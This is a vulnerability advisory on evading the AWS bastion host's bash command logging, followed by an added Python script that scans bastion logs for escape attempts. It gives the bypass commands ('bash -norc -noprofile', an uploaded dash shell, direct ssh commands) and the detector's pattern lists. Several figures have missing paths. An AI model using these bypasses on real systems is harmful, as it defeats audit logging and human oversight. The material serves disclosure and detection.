


AWS Bastion Logger Bypass

Affected Software: Amazon AWS Bastion
Project Website:
Author: Denis Andzakovic
Date Released:

The AWS bastion host ( ) is intended to provide command logging for all users. These command logs are stored both on the bastion host itself, and forwarded to Cloudwatch.

The command auditing implementation allowed a user to bypass the logging, execute an interactive shell and issue commands that were not captured by the AWS bastion's logging mechanisms.

The core issue stemmed from the use of /etc/bashrc as a mechanism for enforcing command logging. The /etc/bashrc file set a read-only PROMPT_COMMAND environment variable which executed the logger command. Techniques to bypass this mechanism are detailed below. Note, this should not be considered a definitive list and further techniques to avoid the /etc/bashrc based command logging very likely exist.

The AWS bastion used the PROMPT_COMMAND environment variable, set as read-only in /etc/bashrc, as shown in the following figure:

~]$ echo '' >
~]$ chmod +x
~]$ export
~]$ unset PROMPT_COMMAND
bash: unset: PROMPT_COMMAND: cannot unset: readonly
~]$ echo 'will this turn up in the bastion log?'
~]$ tail -5 /var/log/bastion/bastion.log
Jul 27 08:11:12 :Mon Jul 27 08:11: :10.64.0.44 :ec2-user :/home/ec2-user: chmod +x
Will this turn up in the bastion
~]$

An attacker could spawn a bash instance that ignores the RC files and subsequently unset the PROMPT_COMMAND:

~]$ bash -norc -noprofile
bash-4.2$ tail -5 /var/log/bastion/bastion.log
Jul 27 08:26:19 :Mon Jul 27 08:26: :10.64.0.44 :ec2-user :/home/ec2-user: env

By providing their own shell executable, an attacker may gain interactive access to the bastion without being logged. The following figure details this technique:

$ scp -i testkey.pem /usr/bin/dash :/dev/shm/
Jul 27 08:28:50 :Mon Jul 27 08:28: :10.64.0.44 :ec2-user :/home/ec2-user: bash -norc -noprofile

Any command execution not performed via bash was not logged. For example, directly executing commands via SSH. The following figure shows a command executed via SSH and the resulting log which does not include the command:

$ ssh -i testkey.pem -l ec2-user 13.239.22.233 'echo "This is a command executed directly"'
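The escape commands themselves are still recorded by the parent shell's PROMPT_COMMAND hook (the figures show "bash -norc -noprofile" in the log), which gives a defender one signal to alert on. The following Python is an added example, not code from the advisory or from the AWS bastion quickstart: it parses log lines in the field layout shown in the figures on this page (syslog timestamp, PROMPT_COMMAND date, client IP, user, working directory, command, separated by " :") and flags entries that indicate a shell started without its RC files, an attempt to unset PROMPT_COMMAND, or a shell executable run from a world-writable directory. The sample log lines are constructed to match that layout; the flag list, shell list and directory list are this example's own assumptions.

```python
"""Flag logger-escape attempts in AWS bastion command logs.

Added example; not code from the advisory or the AWS bastion project.
The field layout assumed here is the one visible in the advisory's figures:
  <syslog ts> :<PROMPT_COMMAND date> :<client ip> :<user> :<cwd>: <command>
"""
import shlex
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample log, mirroring the layout in the advisory's figures.
SAMPLE_LOG = """\
Jul 27 08:11:12 :Mon Jul 27 08:11: :10.64.0.44 :ec2-user :/home/ec2-user: chmod +x ./hook.sh
Jul 27 08:11:40 :Mon Jul 27 08:11: :10.64.0.44 :ec2-user :/home/ec2-user: ls -la
Jul 27 08:26:19 :Mon Jul 27 08:26: :10.64.0.44 :ec2-user :/home/ec2-user: env
Jul 27 08:28:50 :Mon Jul 27 08:28: :10.64.0.44 :ec2-user :/home/ec2-user: bash -norc -noprofile
Jul 27 08:31:02 :Mon Jul 27 08:31: :10.64.0.44 :ec2-user :/home/ec2-user: /dev/shm/dash
"""

# Assumed detection lists (this example's choice, not from the advisory).
SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}
NO_RC_FLAGS = {"-norc", "--norc", "-noprofile", "--noprofile", "--rcfile", "--init-file"}
UNTRUSTED_DIRS = ("/dev/shm/", "/tmp/", "/var/tmp/")


@dataclass
class Entry:
    syslog_ts: str
    prompt_ts: str
    client_ip: str
    user: str
    cwd: str
    command: str


def parse_line(line: str) -> Optional[Entry]:
    """Split one log line on the ' :' field separator; None if it does not fit."""
    parts = line.rstrip("\n").split(" :", 4)
    if len(parts) != 5:
        return None
    # The last field is "<cwd>: <command>"; cwd and command are split on ": ".
    cwd, sep, command = parts[4].partition(": ")
    if not sep:
        return None
    return Entry(parts[0], parts[1], parts[2], parts[3], cwd, command)


def classify(entry: Entry) -> List[str]:
    """Return the reasons (possibly empty) this entry looks like a logger escape."""
    reasons: List[str] = []
    try:
        argv = shlex.split(entry.command)
    except ValueError:
        return ["unparseable command line"]
    if not argv:
        return reasons
    prog = argv[0]
    # `env [opts] [VAR=val ...] program` wraps the real program; look past it.
    if prog == "env":
        rest = [a for a in argv[1:] if not a.startswith("-") and "=" not in a]
        if rest:
            prog, argv = rest[0], rest
    base = prog.rsplit("/", 1)[-1]
    if base in SHELLS and any(a in NO_RC_FLAGS for a in argv[1:]):
        reasons.append("shell started without rc/profile files, so PROMPT_COMMAND is not set in the child")
    if base == "unset" and "PROMPT_COMMAND" in argv[1:]:
        reasons.append("attempt to unset PROMPT_COMMAND")
    if prog.startswith(UNTRUSTED_DIRS):
        reasons.append(f"executable run from world-writable path {prog}")
    return reasons


def scan(log_text: str) -> List[Tuple[Entry, List[str]]]:
    """Parse every line and keep the entries that triggered at least one reason."""
    findings: List[Tuple[Entry, List[str]]] = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append((entry, reasons))
    return findings


if __name__ == "__main__":
    for entry, reasons in scan(SAMPLE_LOG):
        print(f"{entry.syslog_ts} {entry.user}@{entry.client_ip} {entry.command!r}: {'; '.join(reasons)}")
```

Two limits follow directly from what the advisory shows. A PROMPT_COMMAND hook writes an entry only when the parent interactive shell returns to its prompt, so the launch of the unlogged shell appears in the log while nothing run inside it does; and a command passed directly to ssh never reaches this log at all, so it has to be correlated from sshd's own logging rather than from bastion.log. The check above therefore finds the attempts the hook can still see, not the commands that were hidden.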
